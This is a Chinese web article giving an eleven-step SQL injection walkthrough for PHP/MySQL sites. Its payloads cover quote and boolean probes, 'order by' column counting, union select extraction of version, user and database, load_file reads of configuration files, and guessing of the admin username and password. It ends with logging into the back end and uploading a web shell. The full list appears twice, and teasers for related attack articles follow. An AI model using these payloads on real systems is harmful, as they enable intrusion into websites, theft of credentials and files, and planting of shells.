php注入基本步驟小結
發(fā)布時間:2011-04-01 00:43:02 作者:佚名
我要評論

php注入基本步驟小結,我們在編寫代碼的時候一定要注意注入點。
php注入十點基本步驟
1、判斷是否存在注入,加'、and 1=1、and 1=2
2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本,可以用union查詢
3、利用order by 暴字段,在網址后加 order by 10/* 如果返回正常說明字段大于10
4、再利用union來查詢準確字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常報出數(shù)字,說明猜到準確字段數(shù)。如過濾了空格可以用/**/代替。
(可在分別用user()、database()、version()進行替換報出的數(shù)字進而查看信息)
5、判斷數(shù)據(jù)庫連接帳號有沒有寫權限,and (select count(*) from mysql.user)>0/* 如果結果返回錯誤,那我們只能猜解管理員帳號和密碼了。
6、如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file(char(文件路徑的ascii值,用逗號隔開))也可以用十六進制,通過這種方式讀取配置文件,找到數(shù)據(jù)庫連接等。
7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,說明存在這個表。
8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按報出的數(shù)字進行替換
9、同理再猜解password字段,猜解成功再找后臺登錄。
10、登錄后臺,上傳shell。
11、檢測是不是root權限 and/**/ord(mid(user(),1,1))=114/*
1、判斷是否存在注入,加'、and 1=1、and 1=2
2、判斷版本and ord(mid(version(),1,1))>51/* 返回正常說明是4.0以上版本,可以用union查詢
3、利用order by 暴字段,在網址后加 order by 10/* 如果返回正常說明字段大于10
4、再利用union來查詢準確字段,如: and 1=2 union select 1,2,3,......./* 直到返回正常報出數(shù)字,說明猜到準確字段數(shù)。如過濾了空格可以用/**/代替。
(可在分別用user()、database()、version()進行替換報出的數(shù)字進而查看信息)
5、判斷數(shù)據(jù)庫連接帳號有沒有寫權限,and (select count(*) from mysql.user)>0/* 如果結果返回錯誤,那我們只能猜解管理員帳號和密碼了。
6、如果返回正常,則可以通過and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路徑的ascii值,用逗號隔開)),8,9,10 /* 注:load_file(char(文件路徑的ascii值,用逗號隔開))也可以用十六進制,通過這種方式讀取配置文件,找到數(shù)據(jù)庫連接等。
7、首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6....from user/* 如果返回正常,說明存在這個表。
8、知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6....from user/* 按報出的數(shù)字進行替換
9、同理再猜解password字段,猜解成功再找后臺登錄。
10、登錄后臺,上傳shell。
11、檢測是不是root權限 and/**/ord(mid(user(),1,1))=114/*
相關文章
thinkphp代碼執(zhí)行getshell的漏洞解決
本文來介紹一下thinkphp官方修復的一個getshell漏洞,框架對控制器沒有進行足夠的檢測導致的一處getshell,小編覺得挺不錯的,現(xiàn)在分享給大家,也給大家做個參考。一起跟隨2018-12-12記 FineUI 官方論壇discuz所遭受的一次真實網絡攻擊
這篇文章主要介紹了記 FineUI 官方論壇discuz所遭受的一次真實網絡攻擊,需要的朋友可以參考下2018-11-30- 這篇文章主要介紹了Linux 下多種反彈 shell 方法,需要的朋友可以參考下2017-09-06
- 這篇文章主要為大家介紹了基于反射的XSS攻擊,主要依靠站點服務端返回腳本,在客戶端觸發(fā)執(zhí)行從而發(fā)起Web攻擊,需要的朋友可以參考下2017-05-20
- 這篇文章主要介紹了SQL注入黑客防線網站實例分析,需要的朋友可以參考下2017-05-19
- 這里為大家分享一下sql注入的一些語句,很多情況下由于程序員的安全意識薄弱或基本功不足就容易導致sql注入安全問題,建議大家多看一下網上的安全文章,最好的防范就是先學2017-05-19
- 對于目前流行的sql注入,程序員在編寫程序時,都普遍的加入防注入程序,有些防注入程序只要在我們提交一些非法的參數(shù)后,就會自動的記錄下你的IP地址,提交的非法參數(shù)和動作等,2017-04-29
- 我們友情進行XSS檢查,偶然跳出個小彈窗,其中我們總結了一些平時可能用到的XSS插入方式,方便我們以后進行快速檢查,也提供了一定的思路,其中XSS有反射、存儲、DOM這三類2016-12-27
- 這篇文章主要介紹了Python 爬蟲使用動態(tài)切換ip防止封殺的相關資料,需要的朋友可以參考下2016-10-08
- 這篇文章主要介紹了使用爬蟲采集網站時,解決被封IP的幾種方法的相關資料,需要的朋友可以參考下2016-10-08